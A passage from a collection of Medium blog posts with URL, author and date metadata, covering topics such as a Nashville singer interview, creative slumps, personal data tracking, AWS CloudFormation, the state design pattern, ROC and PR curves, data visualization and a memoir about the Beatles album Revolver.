unproductive… 5. Get off email. I recently read that email occupies approx. 23% of the average employee’s workday, and that average employee checks his or her email 36 times an hour. Ugh! So while email may have been radically disruptive some decades ago, it can be more troublesome than useful today. Initially intended for long form written exchanges, we often choose (or misuse) email for instant messaging and collaboration. My advice when it comes to email is, when possible, reduce your inbox by using it to share sensitive or important information only. Instead, choose tools like Slack to stay connected with your colleagues. Messaging platforms like this allow you to have ongoing, short and informal conversations in real-time and on the go.
https://medium.com/design-ibm/remote-collaboration-for-world-domination-e94b2ca724ef
['Lara Hanlon']
2018-07-11 14:38:50.523000+00:00
['Business', 'Collaboration', 'Remote Working', 'Productivity', 'Design']
Never Done Changing
Never Done Changing Amidst Nashville’s ever-growing community, pop singer/producer Chris Jobe is consistently moving forward. Chris Jobe, 3/30/18 @ The High Watt While leaning against a wall to keep myself from giving into the urge to nap, I find myself in awe of Chris Jobe’s never ending energy. About an hour after his performance on March 30th, he continues to make the rounds, enthusiastically greeting and thanking everyone still in the venue. Even as we sit down in the stairwell of the High Watt to begin our interview, he never stops moving. It seems natural for him to constantly be in motion — so natural that when I ask Chris to pose for a photo afterwards and he sits completely still, it’s jarring. While some people would see this constant energy as someone easily distracted, it becomes clear that he is a talented multi-tasker. We are interrupted several times by passing friends and fans, and when they’ve moved on, he goes right back to speaking where he left off, even when I’ve already forgotten the question. Chris Jobe, 3/30/18 @ The High Watt The 24 year old singer/songwriter/producer never thought he’d end up in Nashville. After applying to multiple schools in New York and Los Angeles and being daunted by the cost, he received a scholarship from Belmont University and, after learning about their music program, decided to give it a shot. He’s now been in Nashville for six years, happy with the community and the way he’s been able to grow as an artist. It’s clear that change and growth have been a constant for him over the years — and he doesn’t expect that to end anytime soon. “What sort of music do you create?” “Originally, it was going to be sarcastically happy pop stuff, and then it ended up being like more indie pop-type R&B.” “How long have you been writing and performing?” “I was 12 years old when I wrote my first song. My parents had just gotten a divorce and I was taking a poetry class…” he pauses, laughing. “I was a very deep twelve year old, all I listened to was Yellow by Coldplay, and lots of David Bowie and Jimmy Hendrix. That was my thing.” He then tells me about his first-ever performance as an 18 year old new to Nashville. It was at the Hard Rock Cafe, and was “terrible.” “Everything that could have gone wrong went wrong — and it was an ugly Christmas Sweater party, so I was wearing my ugliest sweater that you can imagine. I still hadn’t grown into my face yet, and I looked like a young, tall baby in a grandma’s Christmas sweater — and not doing well either.” image via Halfthestory, 10/16/17 @ The High Watt “Stuff like this is never going to be perfect, so performing is really just a matter of being there for people, being a conduit.” If the energy in the crowds that regularly show up at his shows are any indication, Chris Jobe has left that rough start far behind him. It’s taken a lot of work that continues to this day. “Honestly, I’m quite a perfectionist, and performing is not made for perfectionists. Leading up to a show, I always get so anxious. I try to go in there and capture the vibe of every song — but it’s weird to me because I feel like no matter what I do as a performer, it’s always different.” He states that his favorite part of performing is “stage banter” along with witnessing the crowd’s reactions from stage. He wants to be connected with the fans as much as he is with the music — but no matter what other people think, he’s going to follow his own instincts. 
“Stage,” the song he always opens his live sets with, “is kind of about my parents doubting me growing up. I think it’s an important message for kids — if you really want to do something, don’t whine about it, just do it. Just show your parents, hey, look what I can do.” The fact that now his parents have come around makes it a difficult song for him to continue to connect with, and he’s considering removing it from his set lists, even though it’s a crowd favorite. “Now my parents are very supportive because they’ve seen it all happening. So I’m not pissed at my parents anymore but… I dunno, it’s just this weird thing.” “I’m very competitive, and I know music is not a competition by any means, but I feel inspired and driven by my friends’ success — like this guy is fucking crushing it right now, I hope I can get to that level.” One of the things that is not in question is the viral success of his first single, Thank You Internet. “Thank You Internet is something we rewrote several times because the first time we wrote it, we wrote it as a complete joke, my buddy Kyle and I.” He then sings the original bridge while we sit in the stairwell, sending some passing fans and myself into fits of laughter. “Dog and cat videos, yeah! All that shit can stay. But Kim Kardashian and her fake ass — that shit is lame!” Recovering, I ask him about the production of the video, which seemed extremely large scale for an indie artist. “It took about two or three weeks of planning. I have a bunch of talented friends who came together, and it was one of those things where everything fell into place kind of by luck.” A friend of his who has produced successful music videos in the past helped him with permits for filming locations, and keeping Chris’ “overly ambitious ideas” reined in. One of these ambitious ideas was to reach out to different apps and ask them to help with the animation. “We sent it to Tinder and Bumble and Uber, like hey I want to put you in my video, and the ones who responded listened to the song and were like ‘aren’t you dissing us, why would we pay you or give you a sponsorship?’” He also reached out to an animation company in Indiana that was luckily willing to work with him on a “nearly non-existent budget.” Everything, from the usernames in the video to the locations to the time stamps are extremely intentional. With the combination of catchy, relatable lyrics and excellent animation, once the video was completed, they did get one major social media outlet on board. “Once we had the video all put together, we sent it to Facebook and they were like ‘we love this, we want you to be artist of the day.’ We thought it was crazy, but they released it and we got to watch it grow organically. It’s been amazing.” At the time of this article being published on April 17, 2018, the original post of Thank You Internet on Music on Facebook has had 981,890 views — at the time of the interview on April 1st, it had 846K. “I feel like I have a lot of friends who had a song that’s popped off, and for me to have this video, and having so many people show up on Facebook — which I hadn’t really used because I’m such an Instagram guy — that was a really cool experience.” image via Chris Jobe “I’m not focused on getting a label, I’m just focused on getting to a place where I’m super proud of everything I’m doing, so I can give that over to the fans without anxiety. I feel like I’m on the right track.” Shortly after TYI, he released his second single, Love In The Morning. 
Both are crowd pleasers at his live shows, but he feels more comfortable with the latter. “It’s fun and I like what TYI is about, but stylistically it’s different compared to the other songs that I sing where I’m like, ‘hey this is a piece of my soul, here you go.’” He currently has the release of two more singles planned, and is excited to see how his fans receive them. While creating music may take up the majority of his time, Chris does attempt to make it to his friends shows, and make time for other interests. One of his favorite books is The War of Art by Steven Pressfield, which he recommends to all creative people. He enjoyed the movie Ladybird, and hopes Timothée Chalamet — “the guy that was in Ladybird with the french name, on the cover of GQ, kind of androgynous, really good looking dude…” — would play him if there is ever a movie made about his life. When I ask my final question — if there is a song that isn’t his own that he felt described him — he chooses Changing by John Mayer. “It seems crazy because I’m not personally into country-style music, but it’s some of the best songwriting. ‘I’m not done changing/I may be old and I may be young/but I am not done changing.’ I feel like that’s always relevant for me.” Any creative folks who are anxious about turning their projects into their careers can certainly look to Chris Jobe as an example: Accept that change is inevitable & allow it to fuel your growth. Get ready & stay tuned for Chris Jobe’s upcoming singles by following him on Instagram, Facebook, and Spotify! If you’re in the Nashville area, his next performance is a free show at Analog on April 26th at 8:30pm. Enjoy what you just read? Learn more about Meridian Creators here, give us a like on Facebook, follow us on Instagram & Twitter, and consider supporting our growth by subscribing monthly through Patreon or giving a one-time donation through PayPal!
https://medium.com/meridian-creators/never-done-changing-d685ab455382
['Taralei Griffin']
2018-04-18 00:51:21.337000+00:00
['Nashville', 'Music', 'Interview', 'Creativity', 'Indie']
How to Keep Being Creative When Life Feels Dull and Meaningless
Baltimore Orioles first baseman, Chris Davis, was once one of Major League Baseball’s most-feared juggernauts in the batter’s box. In both 2013 and 2015, he led the majors in home runs and held batting averages of .286 and .262, respectively. But by the end of 2018 and extending into the 2019 season, Davis led the league in another statistic, one far less dominant than the number of times he blasted a baseball out of the park — most at-bats in a row without a single hit. Yep, starting September 14, 2018, and ending April 13, 2019, Davis went 0 for 54, marking a historically abysmal stretch of his career and setting the worst hitting streak record in all of MLB history. On the day his slump finally ended, Davis rejoiced, finishing 3 for 5 with two doubles and four RBIs, raising his batting average from .000 to a whopping .079. Still abysmal, but on the rise. Slumps of Any Kind Are Humbling During the 210 days that Davis went hitless, no doubt he felt humbled and (almost) as human as the rest of us. Switching gears from baseball to creativity, “slumps” are something we all run into as humans, and they’re certainly hurdles I’ve struggled with for as long as I’ve been a writer. I have stretches of days, even weeks, when life feels uninspiring and it’s damn near impossible to type anything worthwhile onto the computer screen. Each subsequent slump I fall into, I can’t help but wonder how many more hints life needs to send me before I finally hang up my cape. I’m repeatedly plagued by the thought that: “Maybe this is a sign I should just quit.” Yet every time, I persevere and break out of the slump, usually with a piece of writing that surprises me and surpasses my wildest expectations. This begs a couple of questions — how do you continue to stay creative when life feels boring or monotonous, and how do you keep moving forward while battling through a massive slump? 1. Remind yourself it’s not the challenge you face but how you respond This holds true with everything that happens to you in life. Sometimes it’s a creative slump, other times misspelling a word in your grade school spelling bee, or reading the rejection letter from your dream college, or being broken up with by your significant other, or suffering the death of a loved one. Challenges come and go, some far more devastating than others, but each time you face one, remind yourself that, though this challenge is different from the others, it’s still just another obstacle in your path. It doesn’t matter what it is — you can’t change or control that. But you can always control how you respond to it. Don’t give up. Keep pushing. Life repeatedly tests you. It wants to try and knock you down, but the strong persevere. They get back up. They keep climbing higher. 2. Get back to the basics Too often, humans like to make things far more complicated than they need to be. Look no further than your own email inbox to prove my point. But let’s look at another example — lifting weights. Or more specifically, let’s look at my dad lifting weights. He’s just over 60 years old, and I’m proud as all hell that he’s keeping himself in shape. Looking at the guy, you’d see that he definitely has an above-average fitness level for a male his age, however, in his own world, he struggles to reach his goals in the gym. He’s one of those guys that reads tons of fitness magazines and articles online, always learning new tips, tricks, and fads for building muscle. He tries putting those complicated routines and obscure exercises into practice. 
The first week usually goes great — he feels sore and like he’s making progress. Shortly after, results halt and he’s right back in Slumpville. Feeling the frustration of his failures, he gets demotivated and skips workouts. “I’ll get back to it when I’m feeling more inspired next week.” And that’s the root of the problem right there. He tries to make his work too complicated and ends up breaking the cardinal rule of muscle gains — consistency. The same goes for writing and other creative endeavors. When you feel yourself lacking motivation, in a slump, or struggling to produce anything worthwhile, it’s usually a sign that you need to get back to the basics aka creating consistently. Don’t worry about what you write, or how good whatever you’re writing is. You’re not trying to be the next Ernest Hemingway during a slump, you’re just trying to survive through it. Schedule a time to write and just write. Whatever you do, don’t skip a session. Treat it like religion. Get back to the basics and put in the reps. Will it be boring and hard work? Yes, but it’s necessary to remember where you started and keep up with what got you to where you are today. 3. Consume similarly creative content Every time I find myself lacking creativity, it’s almost always because I’ve stopped ingesting similarly creative content. After all, creativity begets creativity. Other pieces of creative art act like food to fuel my own inner creativeness. But it doesn’t work when you consume just any content. For example, binge-watching an anime show on Netflix or playing Hades on the Switch rarely inspires me with new content ideas in the realm of non-fiction writing. Will I sometimes surprise myself and stumble upon an idea I can use? Sure. Does it happen often? No. If I were a screenwriter or video game developer, these might be viable ways to generate creativity, but for me as a writer, they’re traps — ways to distract or unwind more than anything. What I need to do as a writer, and what you need to do as a creator of whatever it is you create, is to consume similar pieces of creative art. I do this by reading non-fiction books, listening to podcasts, answering questions on Quora, and reading other articles on Medium. When you consume other creative pieces of art, it gets your own creative juices flowing, and ideas start erupting out of your mind like a volcano. Write these down. Write them all down. Before long, you’ll have more ideas coming to you than you’ll be able to launch out into the world. This is where you want to be as a creator — infinite backlog land. Above All, Keep Slugging Through At one point during Chris Davis’ record-breaking slump, he considered drastic action. He thought about walking away from baseball and a massive contract worth millions of dollars. To be honest, that probably would’ve been the easy way out. Easy to give up that much cash? Ok, maybe not, but for a guy who, at one time, was the best in the world, quitting the game would’ve been a surefire way to end the tormenting boos of once-adoring fans and repeatedly striking out at the plate. But as English theologian, Thomas Fuller, once said (though more recently popularized in “The Dark Knight” Batman movie): “It’s always darkest before the dawn.” And though a creative slump can sometimes feel like a lifetime of struggle and misery, it’s during those dark, monotonous times that you find out what kind of person you really are. Don’t give up. Keep slugging through.
https://medium.com/better-advice/how-to-keep-being-creative-when-life-feels-dull-and-meaningless-e37cfb4d1315
['Jason Gutierrez']
2020-12-16 06:01:23.878000+00:00
['Inspiration', 'Creativity', 'Motivation', 'Create', 'Self Improvement']
How to collect data from your life?
How to collect data from your life? A beginner's guide to personal data Photo by Luke Chesser on Unsplash 1. Decide what's important to you in your life Before you start collecting data from your life, you should decide why you want to do it. Do you want to be more productive? Healthier? Happier? Pick one or a couple of areas in your life that you want to improve. But be careful about picking too many fields to track. You should only collect the data that you can process. The key is to go slow and steady, not to move fast and give up early. What gets measured gets improved. — Peter Drucker After you decide why you want to collect data and choose some areas to focus on, it is time to identify the data fields to collect. Let's say you want to focus on health; some data fields to collect could be:
Exercised (true/false)
Steps
Calorie intake (kcal)
Sleep time (hours)
Weight (kg)
Or maybe you want to track how productive you are during the week, month, or year. In that situation, the fields to focus on could be listed as:
Focused time (minutes)
Checked to-do list items (integer)
Your own productivity score for the day (out of 10)
Main mission (true/false) → Every morning I ask myself "If I could only do one thing today, what should I do?" That's my main mission for that day. You can do this weekly or monthly, but I found out that daily missions work the best.
These are just basic examples; you can collect data from every part of your life if you think it is adding some kind of value to your life. Some people track phone screen time, their moods by the weather, their commutes, or (you probably know how popular this is) their Spotify history. You can see other types of tracking ideas in this great post. Since 2013, I have been collecting how many times I sneezed in a year. It started as a misunderstanding: I was supposed to count my blessings in life, but I didn't know the phrase had another meaning. It started like that and now it is my icebreaker story. You can see the silly graph below. 2. Collect data regularly We are only at the stage of collecting the data from our lives. What we are going to do with the data we collect is a subject for another post. However, before doing anything with it we have to make sure it is collected properly and regularly. Consistency is very important here. If you only log data when you are feeling dull or only when you are super productive, the results will not give a clear picture of your life. Every day it gets easier but you gotta do it every day. That's the hard part. But it does get easier. — Jogging Baboon, Bojack Horseman Try to make a habit of manual data entry. Maybe you can include this in your morning/night routine. Make a cup of your favorite hot beverage and dedicate just 5 minutes a day. Create a recurring task in your to-do list app. Use the "Don't Break the Chain" method. If daily logging is too frequent for you, maybe try weekly. Do whatever works for you to do it regularly; trust me, you are going to thank yourself. Photo by Andrew Neel on Unsplash Until this point, we mostly talked about manual data logging, but you should also try to be as regular as possible with automatic data collection. You may wonder how automatic data entry can be irregular; the answer is: because of you. For example, let's say you are tracking your sleep; you have to make sure your smartwatch or phone has enough battery to last until morning.
Or you might be tracking the places you have been over the year, are you sure that you allowed Google Maps to track your location all the time? It is little things like that you should keep an eye on. But no matter how hard you try, sometimes life gets in the way, more important stuff comes up and you can lose the streak. Don’t feel discouraged, we are only human. Just try to fill the gaps as accurately as possible and continue to do what you do. This is a marathon, not a sprint. 3. Tools and systems For all the things I listed above, you can use just a pen and paper but it is almost 2021 and there are much better ways to do it. There are two main categories here. I call them trackers and databases. Trackers are self-explanatory, tools that track data from your life both automatically and manually. Databases are where all of our data sits before we process it. We shape our tools and, thereafter, our tools shape us. — John Culkin Notion Notion is my ultimate database hub and not for just data I collect, for every aspect of my life. How I use Notion as a second brain is a subject to another post but let me show you my setup for next year’s happiness and productivity tracker. I also use this as some kind of a diary. Author’s daily template So what do we have here? This is basically a template to measure how happy and how productive I felt that day. I like to use other fields to create reports at the end of the year. Reports like productivity by days of the week or happiness by exercised days. I also give each day a title like it was an episode from Friends. Such as The One with the Evil Orthodontist or The One With Phoebe’s Birthday Dinner. It is a dorky thing that I do to remember days in a fun way. This might seem like a long list to keep track of every day, but it wasn’t always like this. I started tracking my mood and general wellbeing in 2016. This document has been evolving every year since then. I would like to add some external data, like health, weather, to-do list items, or financial information but it is not possible at this moment with Notion. If you want to use external information, you can use Google Sheets as a database. Google Sheets does almost everything that Notion does but unfortunately, it doesn’t look as good as Notion. Smart watches/bands I believe that smartwatches or smart bands are a bit of luxury items. At the moment you can live just as well without them, they are not essential items for most people, unlike a smartphone. But if you have one it can help a lot to track your life. Photo by Angus Gray on Unsplash Tracking Sleep This is my favorite thing about wearable technology, a device working for you while you are sleeping. I don’t have a lot of information about how does it do that but it is great. You can check your sleep score, the average time you fall asleep at or how many times you wake up in a given night. I believe that you can use these pieces of information to make adjustments that will improve your life immensely. Tracking Steps & Location This is a no-brainer, this is the first objective of a smartwatch. Easy data logging I think removing the friction between thinking and doing is where smartwatches shine. Let’s say you are tracking the water you drink. Pulling your phone off your pocket and logging in after every glass might be a struggle but just a single tap on a screen at your wrist is almost nothing. If you are tracking a field that requires multiple manual data entries in a day, using a smartwatch can help you substantially. 
Apple Health App Health App that comes on iPhones by default is a tremendous database and tracker. I haven’t been on the Android ecosystem since 2014 but I think Google Fit is doing the same thing on Android devices. Health App can give you graphs and insights based on what you provided already. It can hold up lots of data for years without getting any slower and I think this is amazing. You can export all of your information if you would like to transfer on another app. It is very easy to use, just allow the app to do the work. Photo by Arek Adeoye on Unsplash Rapid fire app suggestions
https://medium.com/datadriveninvestor/collect-data-f55780ca8d49
['Emrecan Arık']
2020-12-26 08:51:01.285000+00:00
['Health', 'Productivity', 'Growth Mindset', 'Personal Development', 'Data']
Sleep Sweet Little One
https://medium.com/american-haiku/sleep-sweet-little-baby-23a5e5389357
['Toni Tails']
2020-09-27 11:39:26.309000+00:00
['Humor', 'Mental Health', 'Creativity', 'Poetry', 'Art']
4 Great But Underrated AWS Services
1. CloudFormation CloudFormation is a service that enables us to describe infrastructure as code. Infrastructure as code is a well-known practice of defining and managing IT infrastructure through configuration files. With CloudFormation, we can define all required components and the dependencies between them. There are a few benefits to having everything in configuration files. First, it speeds up the process, as the whole task stays in code: no navigating between different services and connecting them through the user interface. Second, it adds reliability and reduces human error. The code can be reviewed by other engineers, and in case of a mistake, the changes can be reverted quickly. For example, a template of only about seven lines (see the sketch after this section) is enough to create a new S3 bucket under your account with a default setup, at any moment. No need to do the job manually through the AWS console. CloudFormation supports two formats: JSON and YAML. Besides that, CloudFormation offers features such as nested stacks, exporting values, or passing parameters between stacks. Indeed, it is a very powerful service for maintaining a whole company's infrastructure. CloudFormation itself is a free service; you pay only for the provisioned components.
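A minimal sketch of the kind of template referred to above might look like this in YAML (the logical ID and bucket name are placeholders invented for illustration, not the exact snippet from the original post):

AWSTemplateFormatVersion: '2010-09-09'
Description: Minimal stack that provisions a single S3 bucket
Resources:
  ExampleBucket:
    Type: AWS::S3::Bucket
    Properties:
      BucketName: my-example-bucket-name

Assuming this is saved as bucket.yaml, a stack could be created with something like aws cloudformation deploy --template-file bucket.yaml --stack-name example-bucket-stack, where the stack name is also just a placeholder.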
https://medium.com/better-programming/4-great-but-underrated-aws-services-3284ffcb6073
['Dmytro Khmelenko']
2020-10-29 16:35:07.012000+00:00
['AWS', 'Programming', 'Software Development', 'Cloud Computing', 'Cloud']
Stop Using If-Else Statements
APPLIED DESIGN PATTERNS: STATE Stop Using If-Else Statements Write clean, maintainable code without if-else. You’ve watched countless tutorials using If-Else statements. You’ve probably also read programming books promoting the use of If-Else as the de facto branching technique. It’s perhaps even your default mode to use If-Else. But, let’s put an end to that right now, by replacing If-Else with state objects. Note that you’d use this approach if you’re writing a class with methods whose implementations need to change depending on the current state. You’d apply another approach if you’re not dealing with an object’s changing state. Even if you’ve heard about the state pattern, you might wonder how it is implemented in production-ready code. For anyone who’s still in the dark, here’s a very brief introduction. You’ll increase complexity with any new conditional requirement implemented using If-Else. Applying the state pattern, you simply alter an object’s behavior using specialized state objects instead of If-Else statements. Gone are the days of methods stuffed with nested If-Else branching: the kind of PTSD-triggering code that hides logical errors inside an already messy structure. You’ve certainly written more complicated branching before. I have for sure some years ago. That kind of branching logic isn’t even very complex — but try adding new conditions and you’ll see the thing explode. Also, if you think creating new classes instead of simply using branching statements sounds annoying, wait till you see it in action. It’s concise and elegant. Even better, it’ll make your codebase more SOLID, except for the “D” part tho. “Okay, I’m convinced If-Else is evil, now show me how to avoid messy branching code” We’ll be looking at how I replace If-Else branching in production-ready code. It’s a made-up example, but the approach is the same I’ve used in codebases for large clients. Let’s create a very simple Booking class that has a few states. It’ll also have two public methods: Accept() and Cancel(). I’ve drawn a diagram to the best of my abilities that displays the different states a booking may be in. Refactoring branching logic out of our code is a three-step process: create an abstract base state class; implement each state as a separate class inheriting from the base state; and let the Booking class have a private or internal method that takes the base state class as a parameter. Demo time First, we need a base state class that all states will inherit from. Notice how this base class also has the two methods, Accept and Cancel — although here they are marked as internal. Additionally, the base state has a “special” EnterState(Booking booking) method. This is called whenever a new state is assigned to the booking object. Secondly, we’re making separate classes for each state we want to represent. Notice how each class represents a state as described in the beautiful diagram above. Also, the CancelledState won’t allow our booking to transition to a new state. This class is very similar in spirit to the Null Object Pattern. Finally, the booking class itself. See how the booking class is simply delegating the implementation of Accept and Cancel to its state object? Doing this allows us to remove much of the conditional logic, and lets each state only focus on what’s important to itself — the current state also has the opportunity to transition the booking to a new state. (A minimal sketch of these classes appears at the end of this article.) How to deal with new conditional features?
If the new feature would normally have been implemented using some conditional checking, you can now just create a new state class. It’s as simple as that. You’ll no longer have to deal with unwieldy if-else statements. How do I persist the state object in a database? You don’t. The state object is not important when saving an object to e.g. an SQL or NoSQL database. Only knowing the object’s state and how it should be mapped to a column is important. You can map a state to a friendly type name, an enum or an integer. Whatever you’re comfortable with, as long as you have some way of converting the saved value back into a state object. But you’re still using IFs? Yes — they’re essential. Especially when used as guard clauses. It’s the If-Else combination that is a root cause for maintainability headaches. It’s a lot of additional classes! Indeed. As I’ve mentioned in another article, complexity does not originate from the number of classes you have, but from the responsibilities those classes take. Having many, specialized classes will make your codebase more readable, maintainable, and simply overall more enjoyable to work with.
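To make the demo description above concrete, here is a minimal, hypothetical C# sketch of the classes it walks through. Only the Booking class, the base state with internal Accept/Cancel/EnterState methods, and the non-transitioning CancelledState come from the article; the concrete state names (PendingState, BookedState) and the TransitionTo helper are assumptions made for illustration.

public abstract class BookingState
{
    // Called whenever a new state is assigned to the booking object.
    internal virtual void EnterState(Booking booking) { }
    internal abstract void Accept(Booking booking);
    internal abstract void Cancel(Booking booking);
}

public class PendingState : BookingState
{
    internal override void Accept(Booking booking) => booking.TransitionTo(new BookedState());
    internal override void Cancel(Booking booking) => booking.TransitionTo(new CancelledState());
}

public class BookedState : BookingState
{
    internal override void Accept(Booking booking) { /* already accepted, nothing to do */ }
    internal override void Cancel(Booking booking) => booking.TransitionTo(new CancelledState());
}

// Similar in spirit to the Null Object pattern: a cancelled booking ignores further requests.
public class CancelledState : BookingState
{
    internal override void Accept(Booking booking) { }
    internal override void Cancel(Booking booking) { }
}

public class Booking
{
    private BookingState _state;

    public Booking() => TransitionTo(new PendingState());

    // The booking delegates Accept/Cancel to its current state object instead of branching.
    public void Accept() => _state.Accept(this);
    public void Cancel() => _state.Cancel(this);

    internal void TransitionTo(BookingState newState)
    {
        _state = newState;
        _state.EnterState(this);
    }
}

With this shape, adding a new conditional behaviour means adding a new state class rather than another branch.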
https://medium.com/swlh/stop-using-if-else-statements-f4d2323e6e4
['Nicklas Millard']
2020-12-15 17:42:16.136000+00:00
['Technology', 'Software Engineering', 'Csharp', 'Programming', 'Software Development']
An In-Depth Introduction to and Comparison of ROC Curves and PR Curves
An In-Depth Introduction to and Comparison of ROC Curves and PR Curves In a binary classification model, the model usually does not output 0 or 1 directly as the predicted class. Instead, it outputs a probability for each class, for example by applying softmax to produce per-class probabilities. This lets us choose a threshold ourselves: when the predicted probability exceeds the threshold we label the sample as positive, and otherwise as negative. ROC curves and PR curves help us analyze this kind of probabilistic forecast. The ROC curve plots FPR on the X axis and TPR on the Y axis. Each point corresponds to the FPR and TPR obtained at a different threshold, and connecting these points produces the curve. I recommend looking at the confusion matrix introduced in my other article; below is how FPR and TPR are computed. FPR can be expressed as 1 − specificity, where specificity measures how well the model correctly identifies negative samples (FPR = FP / (FP + TN)). The higher the specificity, and thus the lower the FPR, the better the model is at correctly identifying negatives. TPR is also known as sensitivity, which is the recall we are all familiar with (TPR = TP / (TP + FN)): the ability to correctly identify positive samples. The higher the TPR, the better the model is at correctly identifying positives. When using normalized units, the area under the curve (often referred to as simply the AUC) is equal to the probability that a classifier will rank a randomly chosen positive instance higher than a randomly chosen negative one (assuming ‘positive’ ranks higher than ‘negative’) — from wikipedia
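As a concrete illustration of sweeping the threshold, here is a small Python sketch using scikit-learn. The labels and scores are made-up values, not data from this article; each printed row is one point on the ROC curve, and precision_recall_curve gives the corresponding points of the PR curve.

import numpy as np
from sklearn.metrics import roc_curve, precision_recall_curve, roc_auc_score

# Illustrative ground-truth labels and predicted positive-class probabilities
y_true = np.array([0, 0, 1, 1, 0, 1, 0, 1])
y_score = np.array([0.10, 0.40, 0.35, 0.80, 0.20, 0.70, 0.55, 0.90])

# ROC curve: each (FPR, TPR) pair corresponds to one threshold
fpr, tpr, roc_thresholds = roc_curve(y_true, y_score)

# PR curve: each (recall, precision) pair also corresponds to one threshold
precision, recall, pr_thresholds = precision_recall_curve(y_true, y_score)

print("AUC:", roc_auc_score(y_true, y_score))
for f, t, th in zip(fpr, tpr, roc_thresholds):
    print(f"threshold={th:.2f}  FPR={f:.2f}  TPR={t:.2f}")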
https://medium.com/nlp-tsupei/roc-pr-%E6%9B%B2%E7%B7%9A-f3faa2231b8c
['Chen Tsu Pei']
2020-01-02 07:20:09.214000+00:00
['Evaluation', 'AI', 'Python', 'Classification', 'Machine Learning']
Knowledge is More Than a Point of Data.
Every month, with clockwork like precision a brown paper package arrives in the mail. The unwrapping is revealing. For almost 50 years the National Geographic has been enriching my imagination. The connectedness to ourselves, to our planet and cosmos is like a lattice of human context. It’s also an important source for our visual and aesthetic literacy. I see our graphically visual world as distinctly human, whereas raw data points have no human essence. There should be no mistaking data for knowledge. Big Data, and data visualization are important topics. But it’s troubling when they’re stories reduced to little more than ill-defined link bait. Accepting there’s also no unified theory or singular definitions for either data or it’s visualization is important too. We can discern between structured (bits of ledger) and unstructured data (streams of social chatter), but data itself is simply the columns and rows fodder. It’s the slices of pie in that fill a chart. Spreadsheets and pie charts are meaningless artifacts. It’s the art of asking questions that brings them to life. Transforming crumbs of data into information, in turn gets us to the possibility of knowing. Without structure, data doesn’t become knowledge. It’s like looking into a murky swamp and trying to understand the dividing properties of an amoeba. Try viewing it in a petri dish instead. Appreciating when there’s no structure, there’s no meaning attracted me to Manual Lima’s book Visual Complexity. It’s influenced my appreciation of visual literacy. It was also cool seeing Mentionmapp on page 153. With a historical context and framework of techniques and best practices, Visual Complexity also help me discover other visualization leaders (who we’ll write about in future posts). Lima’s depiction of the visualize network being “the syntax of a new language,” made an impression. Knowing that sight is the translational interface between a visual object and a textual relationship, was my… “ahhh, that’s it moment.” When data intersects with visual science, there needs to be an aesthetic anchoring for knowledge to surface. There has to be an art to the science. Lima shares this Matt Woolman quote; “functional visualizations are more than statistical analyses and computation algorithms. They must make sense to the users and require a visual language systems that uses colour, shape, line, hierarchy, and composition to communicate clearly and appropriately, much like the alphabetic and character based languages used worldwide between humans.” From his TED2015 talk Lima says, “we can see this shift from trees into networks in many domains of knowledge. This metaphor of the network, is really already adopting various shapes and forms, and it’s almost becoming a growing visual taxonomy.” Watch Manuel Lima: A visual history of human knowledge Using data and revealing a world of stories is an art. I’m appreciative of how Lima communicates the aesthetic value of visualization. Turning the complex and the chaotic into meaningful social, political, economic, and human insights is essential. We can’t get so lost in the science of data that we forget the importance of allowing our eyes, and allowing ourselves to both revel in it, and to discover knowledge in the art of data. Conceptual artist Katie Lewis devises elaborate methods of recording data about herself, be it sensations felt by various body parts or other other aspects of life’s minutiae plotted over time using little more than pins, thread and pencil marked dates. 
The artworks themselves are abstracted from their actual purpose, and only the organic forms representing the accumulation data over time are left. She describes her process as being extremely rigid, involving the creation of strict rules on how data is collected, documented, and eventually transformed into these pseudo-scientific installations. From the pen of John (cofounder) Please visit Mentionmapp today!
https://medium.com/mentionmapp/knowledge-is-more-than-a-point-of-data-dc31f94a1a4
['Mentionmapp Analytics']
2016-10-30 21:57:16.840000+00:00
['Manuel Lima', 'Data Science', 'Data Visualization', 'Big Data', 'Design']
Revolver changed my life
Revolver changed my life I was in either 7th or 8th grade, and I went to a record store to buy a Beatles album. It was also the very first time I would ever buy a record. I didn’t know much about The Beatles other than any song I heard I liked. One summer I went to day camp at The Thomas School of Horsemanship. Whenever it rained they’d set up chairs in a big barn space and show Help. I think it was the only movie the camp had, and I saw the first 40 minutes of it five times that summer. I loved the in the floor bed John Lennon had. My aunt had two cats named George and Ringo. I knew the other two Beatles were named Paul and John. And that was the extent of my Beatles knowledge. And armed with that scant knowledge I flipped through a bunch of twelve inch 33 1/3 Beatles albums, with their always interesting covers and names. Help. Hard Days Night. Meet the Beatles (in the US it was Meet the Beatles, not With the Beatles). Sgt Peppers. Magical Mystery Tour. The white one. One with no name on it but a picture of four guys with beards and long hair walking in a neighborhood across the road. And there was this weird one with a mostly white cover and line drawings of the four of them. I flipped the various albums over and looked at song titles, figuring I’d buy whatever one had the most songs I actually knew. There were crazy titles! Being For the Benefit of Mr Kite! Polyethylene Pam! Dear Prudence! The Word! I didn’t know these songs. There were so many songs I didn’t know. I couldn’t imagine what they all might sound like. On the mostly white one with the weird cover drawings I knew two songs, Eleanor Rigby and Yellow Submarine, so that was the album I bought. We had a cheap shit stereo at home and a good stereo at home. The cheap shit one was a Panasonic all-in-one with Thruster Speakers… I played the first album I ever bought on the Panasonic in the kids room downstairs in our house. We all have expectations. I knew Eleanor Rigby and Yellow Submarine, so that was what I expected Revolver to sound like. Revolver side one song one begins with some noise — some squirps and chatter, and then a voice: “One Two Three…” Suddenly, a guitar chord slams like someone dropping a metal garbage can lid, a huge bass rolls in and a weird, nasal voice announces, “Let me tell you how it will be…” “What the fuck is this?” I thought. Taxman. Good god. From there it went all around the planet and into the stars. I’d never heard anything like it. Side one ended with a short, fireball of a song called She Said She Said. It was the coolest guitar playing I’d ever heard. The drumming — there’s no words for it. It’s perfect and at the same time it sounds like someone falling down the stairs. The voice trails off at the end, overlapping and repeating, “I know what it’s like to be dead I know what it is to be sad I know what it’s like to be dead I know what it is to be sad….” She Said She Said became my official favorite Beatles song. Side one… I flipped the record over and played side two… There is nothing that can possibly… I mean… how do you even begin to talk about the last song on side 2, the last song on Revolver? How do you talk about Tomorrow Never Knows? It starts with a whine, kick ass drums, and then what sounds like a rampant army of angry lemmings fade in. 
